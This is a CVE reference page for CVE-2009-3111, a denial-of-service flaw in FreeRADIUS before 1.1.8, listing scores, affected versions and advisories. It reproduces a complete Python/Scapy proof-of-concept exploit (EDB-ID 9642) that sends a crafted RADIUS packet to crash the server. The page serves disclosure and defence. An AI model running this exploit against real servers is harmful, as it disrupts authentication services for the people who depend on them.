CVE-2009-3111 : Detail

CVE-2009-3111

92.92%V3
Network
2009-09-09
16h00 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes, as demonstrated by a certain module in VulnDisco Pack Professional 7.6 through 8.11. NOTE: this is a regression error related to CVE-2003-0967.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 9642

Publication date : 2009-09-10 22h00 +00:00
Author : Matthew Gillespie
EDB Verified : Yes

#!/usr/bin/env python # FreeRadius Packet Of Death # Matthew Gillespie 2009-09-11 # Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py # http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/ import sys from scapy.all import IP,UDP,send,Radius,RadiusAttr if len(sys.argv) != 2: print "Usage: radius_killer.py <radiushost>\n" sys.exit(1) PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \ Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \ RadiusAttr(type=69,value="",len=2) send(PoD) # milw0rm.com [2009-09-11]

Products Mentioned

Configuraton 0

Freeradius>>Freeradius >> Version To (including) 1.1.7

Freeradius>>Freeradius >> Version 0.2

Freeradius>>Freeradius >> Version 0.3

Freeradius>>Freeradius >> Version 0.4

Freeradius>>Freeradius >> Version 0.5

Freeradius>>Freeradius >> Version 0.8

Freeradius>>Freeradius >> Version 0.8.1

Freeradius>>Freeradius >> Version 0.9

    Freeradius>>Freeradius >> Version 0.9.1

    Freeradius>>Freeradius >> Version 0.9.2

    Freeradius>>Freeradius >> Version 0.9.3

    Freeradius>>Freeradius >> Version 1.0.0

    Freeradius>>Freeradius >> Version 1.0.1

    Freeradius>>Freeradius >> Version 1.0.2

    Freeradius>>Freeradius >> Version 1.0.3

    Freeradius>>Freeradius >> Version 1.0.4

    Freeradius>>Freeradius >> Version 1.0.5

    Freeradius>>Freeradius >> Version 1.1.0

    Freeradius>>Freeradius >> Version 1.1.3

    Freeradius>>Freeradius >> Version 1.1.5

    Freeradius>>Freeradius >> Version 1.1.6

    References

    http://www.securityfocus.com/bid/36263
    Tags : vdb-entry, x_refsource_BID
    http://secunia.com/advisories/36509
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.vupen.com/english/advisories/2009/3184
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.openwall.com/lists/oss-security/2009/09/09/1
    Tags : mailing-list, x_refsource_MLIST
    http://www.redhat.com/support/errata/RHSA-2009-1451.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://support.apple.com/kb/HT3937
    Tags : x_refsource_CONFIRM